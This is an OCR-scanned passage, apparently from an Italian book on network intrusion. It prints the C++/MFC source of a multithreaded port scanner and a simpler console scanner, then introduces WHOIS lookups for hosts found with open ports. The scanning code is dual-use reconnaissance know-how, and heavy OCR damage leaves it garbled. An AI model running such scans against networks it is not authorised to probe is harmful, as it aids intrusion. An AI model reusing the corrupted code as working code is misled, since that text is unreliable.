afx_msg LRESULT OnThreadExit (WPARAM, LPARAM) ; 

DECLARE_MESSAGE_MAP () 

}; 

//{ { AFX_ INSERT_LOCATION } } 

// Microsoft Visual C++ will insert additional declarations immediately before the 
previous line . 
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Il file .CPP è invece : 

iinclude "stdafx.h" 

iinclude "portscan.h" 

iinclude "portscanDlg.h" 

iinclude "InetAddress . h" 

iinclude " SockThread . h" 

iifdef _DEBUG 
ideflne new DEBUG_NEW 
iundef THISFILE 

static char THIS_FILE[] = FILE ; 

iendif 

//idefine THREAD_ COUNT 128 /* initially, 128 threads - end-users can change this */ 
ideflne THREAD_ COUNT (IL « m_iThreadCount) 
ideflne WM__ THREADEXIT (WM_USER + 123) 

///////////////////////////////////////////////////////////////////////////// 
// CPortscanDlg dialog 



CMutex CPortscanDlg: :m_Mutex (FALSE, "PORTSCANDLG_MUTEX" ) ; // for synchronization 
CArray<CWinThread * , CWinThread *> CPortscanDlg : : m_aThreads ; // current array of 
threads 

CPortscanDlg: : CPortscanDlg (CWnd* pParent /*=NULL*/) 
: CDialog (CPortscanDlg : :IDD, pParent) 

{ 

//{ (AFX_DATA_INIT (CPortscanDlg) 
m_csIPPort = _T(""); 
m_iType = —1; 
m__csStatus =_T(""); 
m_iThreadCount = —1; 
//} }AFX_DATA_INIT 

// Note that Loadlcon does not require a subsequent Destroylcon in Win32 
m_hIcon = AfxGetApp ( ) ->LoadIcon (IDRMAINFRAME) ; 

m_iType - 0; 

m_iThreadCount = 5; // default is 32 threads 

} 

void CPortscanDlg: -.AddThread (CWinThread *pThread) 
{ 

CSingleLock lock (£m_Mutex, TRUE) ; 
int il; 

for(il=0; il < m__aThreads . GetSize () ; il++) 
{ 

if (m_aThreads [il] == pThread) 
{ 

break; 

} 

} 

if(il >= m_aThreads .GetSize () ) 
m_aThreads . Add (pThread) ; 

} 

void CPortscanDlg: -.EndThread (CWinThread *pThread) 
{ 

CSingleLock lock (&m_Mutex, TRUE) ; 
int il; 

for(il=0; il < m_aThreads . GetSize () ; il++) 
{ 

if (m_aThreads [il] == pThread) 
{ 

m aThreads . RemoveAt (il) ; 
break; 

} 

} 

lock. Unlock () ; 
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while ( !theApp.m_pMainWnd->PostMessage (WM_THREADEXIT, 0, 0) ) // this is a wakeup 
cali 

Sleep (0) ; // wait 'till I can post this successfully 
TRACE ("Thread ended - %08xH\r\n", pThread->m_nThreadID) ; 

ì 

void CPortscanDlg : : DoDataExchange (CDataExchange* pDX) 
{ 

CDialog: -.DoDataExchange (pDX) ; 
/ / { {AFX_DATA_MAP (CPortscanDlg) 

DDX_Control (pDX, IDC_THREAD_COUNT , m_wndThreadCount ) ; 

DDX__Control (pDX, IDC_EXIT, m_btnExit) ; 

DDX_Control (pDX, IDOK, m_btnScan) ; 

DDX_Control (pDX, IDHELP, m_btnHelp) ; 

DDX_Control(pDX, IDCANCEL, m_btnCancel ) ; 

DDX^Control (pDX, IDC^SAVE, m_btnSave) ; 

DDX^Control (pDX, IDC^LIST, m_wndList) ; 

DDX__Text (pDX, IDC_IP_PORT, m__csIPPort) ; 

DDX_Radio(pDX, IDC_PORT, m_iType) ; 

DDXJText (pDX, IDC_STATUS, m_csStatus) ; 

DDX_CBIndex (pDX, IDC_ THREAD_ COUNT, m_i ThreadCount ) ; 

//} }AFX_DATA_MAP 

CSingleLock lock (&m_Mutex, TRUE) ; 

if ( !m_aThreads . GetSize () ) 
{ 

m btnCancel . EnableWindow (0) ; 

m_btnHelp . EnableWindow ( 1 ) ; 
m btnSave . EnableWindow (1) ; 
m btnScan . EnableWindow (1) ; 

m btnExit . EnableWindow ( 1 ) ; // force it 

ì 

else 
{ 

m btnHelp . EnableWindow ( 0) ; 
m btnSave . EnableWindow ( 0) ; 
m btnScan . EnableWindow ( 0) ; 

} 

} 

BEGIN_MESSAGE_MAP (CPortscanDlg, CDialog) 
//{ {AFX_MSG_MAP (CPortscanDlg) 
ON_WM_PAINT () 
0N_ WM_ QUER YDRAGICON ( ) 
ON_BN_ CLICKED (IDHELP, OnHelp) 
ON_BN_CLICKED(IDC_SAVE, OnSave) 
ON_BN_CLICKED (IDC_EXIT, OnExit ) 
ON_WM_SETCURSOR () 
//} }AFX_MSG_MAP 

ON_MESSAGE ( WM_ THREADEXI T, On ThreadExi t ) 

END_MESSAGE_MAP () 

///////////////////////////////////////////////////////////////////////////// 
// CPortscanDlg message handlers 

BOOL CPortscanDlg : -.OnlnitDialog () 
{ 

CDialog: : OnlnitDialog () ; 

// Set the icon for this dialog. The framework does this automatically 
// when the application ' s main window is not a dialog 
Setlcon (m_hIcon, TRUE) ; // Set big icon 

Setlcon (m hi con, FALSE) ; // Set small icon 

m_Font.CreateFont(HIWORD(GetDialogBaseUnits()), 0, 0, 0, FW_NORMAL, 0, 0, 0, 
ANSI_ CHARSET, OUT_DEFAULT_PRECIS, CLIP_TT_ALWAYS , 
DEFAULT_QUALITY, FIXED_PITCH / FF_DONTCARE, "Courier New") ; 

m_wndList . SetFont (Sm__Font ) ; 
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; 

LRESULT CPortscanDlg: : OnThreadExit (WPARAM, LPARAM) 
{ 

UpdateData (0) ; // this should fix button enable/disable 
return (0) ; 

ì 

// If you add a minimize button to your dialog, you will need the code below 
// to draw the icon. For MFC applications using the document/view model, 
// this is automatically done for you by the framework. 

void CPortscanDlg: :OnPaint () 
{ 

if (Islconic () ) 
{ 

CPaintDC de (this) ; // device context for painting 

SendMessage (WM ICONERASEBKGND , (WPARAM) de .GetSafeHdc () , 0) ; 

// Center icon in client rectangle 

int cxlcon = GetSystemMetrics (SM_CXICON) ; 

int cyleon = GetSystemMetrics (SM_CYICON) ; 

CRect rect ; 

GetClientRect (irect) ; 

int x = (rect . Width () — cxlcon + 1) / 2; 
int y = (rect .Height () - cyleon + 1) / 2; 

// Draw the icon 

de . Drawlcon (x, y, m_hIcon) ; 

} 

else 
( 

CDialog: -.OnPaint () ; 

} 

} 

BOOL CPortscanDlg: -.OnSetCursor (CWnd* pWnd, UINT nHitTest, UINT message) 
{ 

CSingleLock lock (&m__Mutex, TRUE) ; 

if(!m_aThreads.GetSize() Il nHitTest != HTCLIENT) 
{ 

lock. Unlock () ; 

// set to default when no threads running or not in client area 
return CDialog: : OnSetCursor (pWnd, nHitTest, message); 

} 

else 
{ 

lock. Unlock () ; 

SetCursor ( : : LoadCursor (NULL, IDC_WAIT) ) ; // set to hourglass 
return (TRUE) ; 

ì 

) 

// The system calls this to obtain the cursor to display while the user drags 

// the minimized window. 

HCURSOR CPortscanDlg: : OnQueryDraglcon ( ) 

{ 

return (HCURSOR) m__hIcon; 

) 

void CPortscanDlg: :OnHelp() 
{ 

AfxMessageBox ( "This application scans for IP addresses listening on a particular 
port, " 

"or for listening ports on a particular IP address . It uses multiple 

n 

"threads of execution to minimize the time delay. You should have a 

fast " 

"internet connection to maximize its effectiveness in the scan.\n" 
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"desired IP mask and port number in the ' IP/Port ' box, as a 4-number 

IP " 

"address followed by a ' : ' and the port number as a decimai value " 
" (such as 80 for www service) . Each number value in the IP mask must 

be " 

"a value between 0 and 255, or a single asterisk ' * ' . An asterisk 

will " 

"cause the numbers in that section to scan for ports from 0 to 255. 

You " 

"can speci fy multiple asterisks in the address, such as '192.168.*.*'. 

n 

"A valid entry might be something like ' 192 . 168 . * . * : 80 ' .\n" 

"For Information on ports, see RFC1700 . Commonly used ports are 7 

(echo) , " 

"21 (ftp), 23 (telnet), 25 (smtp) , 79 (finger), 80 (http), 110 (pop3) , 
and 139 (netbios) . \n" 

"To scan for listening ports on a single IP, select 'Scan Ports' and " 
"enter the desired IP address (server address) as a 4-number IP 

address " 

" (such as 192 .168 .0 .1) or known server name (such as 
www.microsoft.com) .\n\n" 

"PLEASE do not ABUSE this application, as it can adversely affect 

bandwidth. ", 

MB^ICONASTERISK) ; 

) 

void CPortscanDlg: :OnSave () 
{ 

CFileDialog dlg (FALSE); 

if(dlg.DoModal() == IDOK) 
{ 

HANDLE hFile = CreateFile (dlg. GetPathName () , GENERIC_READ / GENERIC_WRITE, 

0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 
NULL) ; 

if (hFile == INVALID_HANDLE__VALUE) 

{ 

AfxMessageBox ("Unable to open desired file"); 
return; 

} 

CString csTemp, csBuf; 
int il; 

for(il=0; il < m_wndList .GetCount () ; il++) 
{ 

m_wndList . GetText (il, csTemp) ; 
csBuf += csTemp + "\r\ii"; 

DWORD cbl; 

if(!WriteFile (hFile, (LPCSTR) csBuf, csBuf . GetLength ( ) , Sebi, NULL) Il 
cbl != (DWORD) csBuf. GetLength () ) 

{ 

AfxMessageBox ("Wr ite error on output file"); 

) 

CloseHandle (hFile) ; 

} 

} 

void CPortscanDlg : :OnOK() 
{ 

// CDialog: : OnOK () ; 

m_wndList . ResetContent () ; 
UpdateData (1) ; 

mbtnCancel . EnableWindow ( 1 ) ; // I do this MANUALLY before creating threads 

m_btnHelp . EnableWindow ( 0 ) ; // disable THESE manually as well 
m_btnSave . EnableWindow (0) ; 
m_btnScan . EnableWindow (0) ; 
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// scan ports for a given IP address 

// NOTE: if user specifies named address, do a scan for 
// every IP address . This may requires nvltiple 

// sets of threads, but that 's not a problem. 

CInetAddress addr (m_csIPPort , 0) ; // should be an address with no port 

if(!addr. IsValid() ) 
{ 

AfxMessageBox ( "Internet address is not valid") ; 

UpdateData (0) ; 
return; 

} 

CString csTemp; 

csTemp. Format (" SCANNING: %03d.%03d.%03d.%03d", 

(BYTE) addr [0] . sin_addr.S_un.S_un_b.s_bl, 
(BYTE) addr [0] . sin_addr .S_un. S_un_b . s_b2, 
(BYTE) addr [0] . sin_addr .S_un. S_un_b . s_b3, 
(BYTE) addr [0] . sin_addr.S_un.S_un_b.s_b4) ; 

m_wndList .AddString (csTemp) ; 

int il; 

if (addr . GetDimensions () > 1) 
{ 

AfxMessageBox ( "This address has multiple IP addresses . Only the first will be 
scanned. ") ; 



for (il=l; il < addr . GetDimensions () ; il++) 
{ 

csTemp. Format (" (alt IP) %03d.%03d.%03d.%03d", 

(BYTE) addr [il ] . sin_addr . S_un . S_un_b. s_bl, 
(BYTE) addr [il ] . sin_addr . S_un . S_un_b. s_b2, 
(BYTE) addr [il ] . sin_addr . S_un.S_un_b.s_b3, 
(BYTE) addr [il ] . sin_addr . S_un . S_un_b. s_b4) ; 

m_wndList . AddString ( csTemp) ; 

} 

} 

// spawn ' THREAD_COUNT ' threads 
CWaitCursor wait; 

for(il=0; il < THREAD_COUNT; il++) 
{ 

csTemp . Format ( "%d" , il); 



SetDlgltemText (IDC_STATVS, csTemp) ; 

CSockThread *pT = (CSockThread *)AfxBeginThread(RUNTIME_CLASS(CSockThread), 

THREAD_PRI0RITY_N3RMAL - 1, 
0, CREATE_SUSPENDED) ; 

if(lpT) 
{ 

AfxMessageBox ( "ERROR: unable to create enough threads to complete task.\n" 
"Select a smaller number of threads before trying again . ") ; 



OnCancel () ; 
return; 

} 



pT- 


->IIL 
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= addr . sin addr . S 


un . 
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pT->ResumeThread () ; 
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; 

else 
{ 

/ / check for a range of addresses 

CString csIP = m_csIPPort ; 

int iPort = 7; // default is echo port 

Int il = csIP.FindC : '); // get the ' : ' for the port # 

if(il >= 0) 
{ 

iPort = atoi(csIP.Mid(il + 1) ) ; 

csIP = csIP.Left (il) ; 
csIP . TrimRight () ; 

} 

int aIP[4]; 

if ( ! csIP . GetLength () Il 

( ! CInetAddress : : IsAddress (csIP) £& ! CInetAddress : : IsAddressRange (csIP) ) / / 
.' CInetAddress : : GetAddressRange ( csIP, alP) ) 

{ 

AfxMessageBox ( "You must enter a valid IP address, substituting '*' for " 

"those portions that you want to scan, and specify an optional " 
"port number, in a format as follows:\n" 
"192.168.0. *:80\n" 

"The above IP address and port will scan ali addresses between " 
"192.168.0.0 and 192.168.0.255 for port 80."); 

UpdateData (0) ; 
return; 

} 

int iThreadCount = THREAD_ COUNT; 

if (iThreadCount > 256) 

{ 

// can't have more than 256 

AfxMessageBox ( "WARNING : Algorithm limits this scan to 256 threads maximum", 
MB_ICONASTERISK) ; 

iThreadCount = 256; 

} 

// spawn ' THREAD_COUNT ' threads 
CWaitCursor wait; 
CString csTemp; 

csTemp. Formate SCANNING: %s for port %d", 

(LPCSTR) csIP, iPort ) ; 

m_wndList .AddString (csTemp) ; 

for(il=0; il < iThreadCount; il++) 
{ 

csTemp. Format ("%d" r il); 
SetDlgltemText (IDC_STATUS , csTemp) ; 

CSockThread *pT= (CSockThread * ) AfxBeginThread (RUNTIME_CLASS (CSockThread) , 

THREAD_PRIORITY_NORMAL - 1, 
0, CREATE_SUSPENDED) ; 

if('.pT) 

( 

AfxMessageBox ( "ERROR: unable to create enough threads to complete task.\n" 
"Select a smaller number of threads before trying again . ") ; 

OnCancel () ; 
return; 

} 
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pT->m_aIP[l] = aIP[l]; 
pT->m_aIP[2] = aIP[2]; 
pT->m_aIP[3] = aIP[3]; 

pT—>m_iIncr = iThreadCount; 
pT->m_iMask = il; 

pT—>m_iPort = iPort; // scan only 1 
pT->ResumeThread () ; 

} 

} 



UpdateData (0) ; 

} 

void CPortscanDlg: -.OnCancel () 
{ 

CSingleLock lock (&m_Mutex, TRUE) ; 
int il; 

for(il=0; il < m_aThreads .GetSize () ; il++) 
{ 

if (m_aThreads [il ] ) 
l 

m_aThreads [il ]->Post ThreadMessage (WM_QUIT, 0, 0) ; 

} 

} 

lock. Unlock () ; 

m btnCancel . EnableWindow (0) ; 

ì 

void CPortscanDlg : -.OnExit () 
{ 

CDialog: : OnCancel () ; 

} 

Come avevamo detto all'inizio il programma permette di attivare più THREAD e questi 
vengono gestiti da un apposita classe. 

§if ! defined (AFX_SOCKTHRERD_H 4F7ACBD4 6D0B 11D2 A3FC 004033901FF3 INCLUDED ) 

idefine AFX__SOCKTHREAD_H 4F7ACBD4_6D0B_11D2_A3FC_004033901FF3 INCLUDED_ 

#if _MSC__VER > 1000 
ipragma once 

iendif // _MSC_VER > 1000 



///////////////////////////////////////////////////////////////////////////// 
// CSockThread thread 

class CSockThread : public CWinThread 
{ 

DECLARE_DYNCREATE (CSockThread) 
protected: 

CSockThread () ; // protected constructor used by dynamic creation 

// Attributes 
public: 

int m_aIP [4] ; // the IP address to scan (—1 scans a range) 

int m_iPort; // the port to scan (-1 scans ali) 

int m_iMask ; // the 'mask ' value for this thread 

int m_ilncr; // the ' increment ' value for this thread 

// Operations 
public: 

// Overrides 

// ClassWizard generated virtual function overrides 
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//{ {AFX_VIRTUAL (CSockThread) 
public: 

virtual BOOL Initlnstance () ; 
virtual int Exit Inst ance () ; 
//} }AFX_VIRTUAL 

// Implementation 
protected: 

virtual ~CSockThread ( ) ; 

UINT ScanThreadProcO ; 

// Generated message map functions 
//{ (AFX_MSG (CSockThread) 

// NOTE - the ClassWizard will add and remove member functions here. 
//} }AFX_MSG 

DECLARE_MESSAGE__MAP () 

}; 

///////////////////////////////////////////////////////////////////////////// 

//{ (AFX_INSERT_LOCATION) } 

// Microsoft Visual C++ will insert additional declarations immediately before the 
previous line . 

iendif // !defined(AFX_SOCKTHREAD_H_4F7ACBD4_6D0B_HD2_A3FC_004033901FF3__INCLVDEL 

Il file .cpp legato alla classe dei THREAD è : 

iinclude "stdafx.h" 

iinclude "portscan.h" 

iinclude "SockThread.h" 

iinclude "PortScanDlg . h" 



iifdef _DEBUG 
idefine new DEBUG_NEW 
iundef THIS_FILE 

static char THIS_FILE[] = FILE ; 

iendif 

// bug fixes - from SOCKCORE . CPP 

idefine _afxSockThreadState AfxGetModuleThreadState () 
idefine _AFX_SOCK THREAD STATE AFX_MODULE_THREAD_STATE 



///////////////////////////////////////////////////////////////////////////// 
// CSockThread 

IMPLEMENT_DYNCREATE (CSockThread, CWinThread) 

CSockThread: : CSockThread ( ) 

{ 

} 

CSockThread: : ~CSockThread () 

{ 

} 

BOOL CSockThread: : Initlnstance () 
{ 

// if ( lAfxSocketlnit () ) 

// l 

// return (FALSE) ; 

// } 

// initialize Winsock library (from AfxSocketlnit — bug, must inline it here) 
WSADATA wsaData; 

WORD wVersionRequested = MAKEWORD (1, 1) ; 

int nResult = WSAStartup (wVersionRequested, SwsaData) ; 

if (nResult != 0) 

return FALSE; 
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if (LOBYTE (wsaData . wVersion) 1=1 // HIBYTE (wsaData.wVersion) ! = 1) 
{ 

WSACleanup () ; 
return FALSE; 

} 

// _AFX_SOCK_THREAD_STATE* pState = _afxSockThreadState; 

// if (pState->m_pmapSocketHandle == NULL) 

// pState->m pmapSocketHandle = new CMapPtrToPtr; 

// if (pState->m_pmapDeadSockets == NOLL) 

// pState->m _pmapDeadSockets = new CMapPtrToPtr; 

// if (pState->m plistSocketNotifications == NULL) 

// pState->m plistSocketNotifications = new CPtrList ; 

/*PostQuitMessage (*/ ScanThreadProc ( ) ; // ); 

WSACleanup () ; 

return (TRUE) ; // this will do what I want 

} 

int CSockThread : : Exitlnstance () 
{ 

return CWinThread: : Exitlnstance () ; 

} 

BEGIN_MESSAGE__MAP (CSockThread, CWinThread) 

// { {AFX_MSG_MAP (CSockThread) 

// NOTE — the ClassWizard will add and remove mapping macros here. 

//} }AFX_MSG_MAP 
END_MESSAGE_MAP () 

///////////////////////////////////////////////////////////////////////////// 
// CSockThread message handlers 

class CScanThreadClass 
{ 

public: 

CScanThreadClass () { m_bQuit = FALSE; CPortscanDlg : : AddThread (AfxGetThread ( ) ) ; } 
~CScanThreadClass () { CPortscanDlg: :EndThread(AfxGetThread() ) ; } 

BOOL KeepRunning ( ) 

{ MSG msg; if(m_bQuit) return (FALSE) ; 

if(::PeekMessage(&msg, NULL, WM__QUIT, WM_QUIT, PM_REMOVE) ) 
( m_bQuit = TRUE; return (FALSE) ; } 
return (TRUE) ; 

) 

protected: 

BOOL m_J}Quit; 

}; 

UINT CSockThread: : ScanThreadProc () 
{ 

CScanThreadClass stc; // auto-registers me with dialog box, helps kill thread 



// CSocket sock; 

SOCKET s = socket (PF_INET, SOCK^STREAM, 0) ; // that's the way MFC does it 

if(s == INVALID_SOCKET) 
{ 

AfxMessageBox ( "SOCKET limit reached - cannot create new socket. \r\n" 

"Reduce the maximum # of threads by changing the THREAD__COUNT " 
"de fine in ' portscandlg . cpp ' and re-compile."); 

return (-1) ; 

} 

int il, i2, i3, i4, i5; 

int iSocklncrl = 1, iSockIncr2 = 1, iSockIncr3 = 1, iSockIncr4 = 1; 
int iSockStartl = 0, iSockStart2 = 0, iSockStart3 = 0, iSockStart4 = 0; 
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BOOL bScanPort = TRUE; 
BOOL bScanlP = FALSE; 

if (m_iPort >= 0) 
{ 

bScanPort = FALSE; 

ì 

if(m_aIP[0] < 0 II m_aIP[l] < 0 II 
m_aIP[2] < 0 II m_aIP[3] < 0) 

{ 

bScanlP = TRUE; 

// determine which part of the IP address gets ' m^ilncr ' and 'm iMask ' 
// whenever I 'm scanning IP ' s 

if(m_aIP[3] < 0) 

iSockIncr4 = m_ilncr; 
iSockStart4 = m iMask; 

else if(m_aIP[2] < 0) 

iSockIncr3 = m_ilncr; 
iSockStart3 = m_iMask; 

else if(m__aIP[l] < 0) 

iSockIncr2 = m_ilncr; 
iSockStart2 = m_iMask; 

else // if(m_aIP[0] < 0) 

iSocklncrl = m_ilncr; // here it really doesn't matter if it's zero or not 
iSockStartl = m__iMask; 

} 

for(il = (m_aIP[0] >= 0 ? m_aIP[0] : iSockStartl) ; 

stc.KeepRunning() SS il < 256 SS (il == m_aIP[0] Il m_aIP[0] < 0) ; il += 
iSocklncrl ) 
{ 

for(i2 = (m_aIP[l] >= 0 ? m_aIP[l] : iSockStart2) ; 

stc.KeepRunningO SS i2 < 256 SS (i2 == m_aIP[l] Il m_aIP[l] < 0) ; i2 += 
iSockIncr2) 
{ 

for(13 = (m_aIP[2] >= 0 ? m_aIP[2] : iSockStart3) ; 

stc.KeepRunningO SS i3 < 256 SS (i3 == m_aIP[2] Il m_aIP[2] < 0) ; 13 += 
iSockIncr3) 
{ 

for(i4 = (m_aIP[3] >= 0 ? m_aIP[3] : iSockStart4) ; 

Stc.KeepRunningO SS i4 < 256 SS (i4 == m_aIP[3] Il m_aIP[3] < 0) ; i4 += 

iSockIncr4) 
{ 

for(i5 = (m_iPort >= 0 ? m_iPort : m_iMask) ; 

stc.KeepRunningO SS i5 < 65536 SS (i5 == m_iPort II m__iPort < 0) ; 
i5 += m_ilncr) 

{ 

CString csTemp, csTemp2; 

if (bScanPort) 
{ 

csTemp .Format ("%d", 15) ; 

} 

else 
{ 

csTemp. Format ( "%d. %d. %d. %d" , il, i2, 13, 14) ; 

} 

: : SetDlgltemText (theApp.m_pMainWnd->GetSafeHwnd() , 
IDC_STATUS, (LPCSTR) csTemp) ; 

// here ' s where the fun begins 

SOCKADDR_ IN sa; 
memset(Ssa, 0, sizeof (sa) ) ; 
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sa . sin_j>ort = htons (±5) ; 
sa . sin_family = AF_INET; 

sa . sin_addr . S_un . S_un_jb . s_bl = (BYTE)il; 

sa . sin_addr . S_un . S_un_b . s_t>2 = (BYTE) ±2; 

sa. sin_addr. S_un .S_un_b. s_£>3 = (BYTE) i3; 

sa . sin_addr . S_un . S_un_b . s_b4 = (BYTE) 14; 

if (Iconnect (s, (SOCKADDR *)Ssa, sizeof(sa))) 
// if (sock . Connect ( (SOCKADDR *) Ssa, sizeof (sa) ) ) 

{ 

if (bScanlP) 
( 

csTemp. Format ("%03d.%03d.%03d.%03d", il, i2, i3, i4) ; 

if (bScanPort) 
csTemp += " 

} 

else 
( 

csTemp = ""; 

} 

if (bScanPort) 
( 

csTemp2 .Format ( "%6d" , i5) ; // make sure it has lead white space 
servent *lpS = getservbyport (htons (i5) , NULL) ; 

if (IpS && lpS->s_name) 

csTemp2 += " " + (CString) lpS->s_name; 
else if(i5 == 7) 

csTemp2 += " echo"; 
else if(i5 == 9) 

csTemp2 += " discard"; 
else if(i5 == 13) 

csTemp2 += " daytime" ; 
else if(i5 == 17) 

csTemp2 += " qotd"; 
else if(i5 == 19) 

csTemp2 += " chargen" ; 
else if(i5 == 21) 

csTemp2 += " ftp"; 
else if(i5 == 22) 

csTemp2 += " erm" ; 
else if(i5 == 23) 

csTemp2 += " telnet " ; 
else if(i5 == 25) 

csTemp2 += " smtp" ; 
else if(i5 == 79) 

csTemp2 += " finger" ; 
else if(i5 == 80) 

csTemp2 += " www-http"; 
else if(i5 == 110) 

csTemp2 += " pop3"; 
else if(i5 == 119) 

csTemp2 += " nntp"; 
else if(i5 == 135) 

csTemp2 += " loc-srv" ; 
else if(i5 == 139) 

csTemp2 += " nbsession"; 
else if(i5 == 443) 

csTemp2 += " https"; 
else if(i5 == 569) 

csTemp2 += " MSN"; 
else if(i5 == 1080) 

csTemp2 += " socks"; 

} 

else 
( 

csTemp2 = ""; 

} 

csTemp += csTemp2 ; 
TRACEO (csTemp + "\r\n") ; 
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: : SendDlgltemMessage ( theApp . m_pMainWnd->GetSafeHwnd () , 
IDC__LIST, LB__ADDSTRING, (WPARAM) 0, 
(LPARAM) (LPCSTR) csTemp) ; 

closesocket (s) ; 
// sock . Close () ; 

// if (! sock. Create ()) 

s = socket (PF_INET, SOCK_STREAM, 0) ; // that's the way MFC does it 
if(s == INVALID_SOCKET) 

{ 

AfxMessageBox ( "SOCKET limit reached — cannot create new socket. \r\n" 
"Reduce the maximum # of threads by changing the 

THREAD_ COUNT " 

"define in 'portscandlg . cpp ' and re-compile."); 



return (-1) ; 

} 

} 

} 

} 

} 

} 

} 

// sock. Close () ; 

if(s != INVALID_SOCKET) 
closesocket (s) ; 



return (0) ; 

} 



Sulla rete è disponibile una serie di scanner tra i quali non esiste che l'imbarazzo della scelta 
tra cui molti ce dispongono di funzioni anche molto complesse atte ad identificare altri 
particolari. 

Un altro sergente legato alla funzione di portascanner creabile in modo più semplice è il 
seguente : 

^include <windows.h> 
iinclude <stdio.h> 

void main( int argc, char *argv[ ], char *envp[ ] ) 
{ 

if ( (argc < 2) Il (argc>4) ) 
i 

printf ( "Usage : scanip <ip__addr> [<start_port> [<stop_port>] ]\n" ) ; 
return; 

} 

if (sizeof (argv[l] ) >255) 
{ 

printf ( "invalid ip address . \n ") ; 
return; 

} 

char ipAddr [15] ; 

char hostName [255] ; 

int hnLength=0 ; 

struct hostent *heHost=NULL; 

u_long ialP; 

wsprintf (ipAddr, "%s", argv[l ] ) ; 

iaIP=inet_addr (ipAddr) ; 
if (iaIP==INADDR_NONE) 
{ 

hnLength=0; 

while(argv[l] [hnLength] !='\0 ') 
{ 

hostName [hnLength] =argv [1 ] [hnLength] ; 
hnLength++ ; 

ì 

hostName [hnLength ] = ' \ 0 ' ; 

printf ("Not an ip, possible is a host name: %s, unsupported 
yet. \n", hostName); 
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return; 
/* 

heHost=gethostbyname ( (const char FAR *)hostName); 

if (heHost==NULL) 

{ 

printf ("IP or Host Name Unknown\n") ; 
return; 

ì 

iaIP=* ( (long *) (heHost->h_addr) ) ; 
*/ 

} 

int startPort=0; 
if (argc>2) 

startPort=atoi (argv[2] ) ; 

printf C "Scanning Front: %d " , startPort) ; 

int stopPort=OxFFFF; 
if (argc>3) 

stopPort=atoi (argv[3] ) ; 

printf ("To: %d\n" , stopPort) ; 

WS ADATA dWSAData; 

dWSAData . wVersion=0; 

int tstResult; 

if ( (tstResult=WSAStartup (0x0201, SdWSAData) ) 1=0) 
{ 

printf ("WSAStartup failed %d. tstResult) ; 
return; 

} 

SOCKET tst Socket; 

struct sockaddr in sinLocale; 
struct sockaddrin sinRemote; 

tstSocket=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) ; 

if (tstSocket==INVALID_SOCKET) 

{ 

printf ( "Error when create socket . . . \n ") ; 
return; 

} 

sinLocale . sin_addr . s_addr = htonl (INADDR_ANY) ; 
sinLocale . sin_family=AF_INET; 

if (bind (tst Socket, 

(const struct sockaddr FAR *) SsinLocale, 
sizeof (sinLocale) ) ==SOCKET_ERROR) 

{ 

closesocket (tstSocket) ; 

printf ( "Error when bind socket . . . \n ") ; 
return; 

} 

sinRemote . sin^addr .Sun. Saddr=iaIP ; 
sinRemote . sin_family=AF INET; 

struct fd_set fdSet; 

struct timeval tmvTimeout={OL, OL) ; 

FD_ZERO (SfdSet) ; 

FD_SET (tstSocket, SfdSet) ; 

tstResult=select (0, SfdSet , NULL, NULL, StmvTimeout) ; 

while (startPort<=stopPort) 
{ 

sinRemote . sin_port=htons (startPort) ; 

printf ("Try connected to: %s : %d" , argv [1] , startPort) ; 
tstResult=connect (tstSocket, 

(const struct sockaddr FAR *) SsinRemote, 
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if (tstResult ! =SOCKET_ERROR) 
{ 

closesocket (tstSocket) ; 
pr±ntf(" Success\n") ; 

} 

else 
{ 

tstResult=WSAGetLastError () ; 

switch (tstResult) 

{ 

case WSANOTINITIALISED: 

printff " Fall (WSANOTINITIALISED) \n ") ; 
break; 
case WSAENETDOWN: 

printff" Fall (WSAENETDOWN) \n") ; 
break; 
case WSAEADDRINOSE : 

prlntf( " Fall (WSAEADDRINUSE) \n ") ; 
break; 

case WSAEINTR : 

printff " Fall (WSAEINTR) \n ") ; 
break; 
case WSAEINPROGRESS : 

printf( " Fall (WSAEINPROGRESS) \n ") ; 
break; 
case WSAEALREADY: 

printf(" Fall (WSAEALREADY) \n") ; 
break; 

case WSAEADDRNOTAVAIL : 

printff " Fall (WSAEADDRNOTAVAIL) \n ") ; 
break; 
case WSAEAFNOSUPPORT : 

printf( " Fall (WSAEAFNOSUPPORT) \n ") ; 
break; 
case WSAECONNREFUSED : 

printf( " Fall (WSAECONNREFUSED) \n ") ; 
break; 

case WSAEFAULT: 

printff" Fall (WSAEFAULT) \n" ) ; 
break; 

case WSAEINVAL: 

printff " Fall (WSAEINVAL) \n ") ; 
break; 

case WSAEISCONN: 

printff" Fail (WSAEISCONN) \n") ; 
break; 
case WSAENETUNREACH : 

printf( " Fail (WSAENETUNREACH) \n ") ; 
break; 

case WSAENOBUFS: 

printf(" Fail (WSAENOBUFS) \n") ; 
break; 
case WSAENOTSOCK: 

printf( " Fail (WSAENOTSOCK) \n ") ; 
break; 
case WSAETIMEDOUT : 

printf( " Fail (WSAETIMEDOUT) \n ") ; 
break; 
case WSAEWOULDBLOCK : 

printf( " Fail (WSAEWOULDBLOCK) \n ") ; 
break; 

case WSAEACCES: 

printf(" Fail (WSAEACCES) \n" ) ; 
break; 

de fault : 

printff" Fail (%d) \n ", tstResult) ; 
break; 

} 

} 

startPort++; 

} 



WSACleanup () ; 

ì 
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Terminata questa fase d'indagine indirizzata ad individuare gli Ip con delle porte aperte ora si 
tratta di individuare il dominio associato all'host individuato. 

Nei capitoli in cui abbiamo parlato della gestione dei DNS abbiamo visto che quando si 
intende inserire su internet dei sistemi è necessario registrare un dominio con un determinato 
nome. 

Nell'ambito di questo è possibile definire i vari hosts a cui vengono associati determinati IP 
collegati a servizi di server. 

Quando tramite un programma come quello che abbiamo appena visto individuiamo un 

HOST il passo successivo è quello di riuscire a capire in quale dominio questo host è definito. 

Su Internet tutti i domini vengono mantenuti dentro ai database di quella definita con il nome 

di ARIN ovvero American Registry for Internet Numbers. 

La funzione per individuare queste informazioni è quella chiamata WHOIS. 

Ora possiamo fare allo stesso modo ovvero creare un progetto nuovo con Visual Studio e 

scriverci il seguente codice. 

L'applicazione deve essere come l'altra basata sulla dialog. 
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Il file delle risorse è il seguente : 

//Microsoft Developer Studio generateci resource script . 

// 

iinclude "resource. h" 

gdefine APSTUDIO_READONLY_SYMBOLS 

///////////////////////////////////////////////////////////////////////////// 
// 

// Generated front the TEXTINCL UDE 2 resource. 

// 

iinclude "afxres.h" 

///////////////////////////////////////////////////////////////////////////// 
#undef APSTUDIO_READONLY_SYMBOLS 

///////////////////////////////////////////////////////////////////////////// 
// English (U.S.) resources 

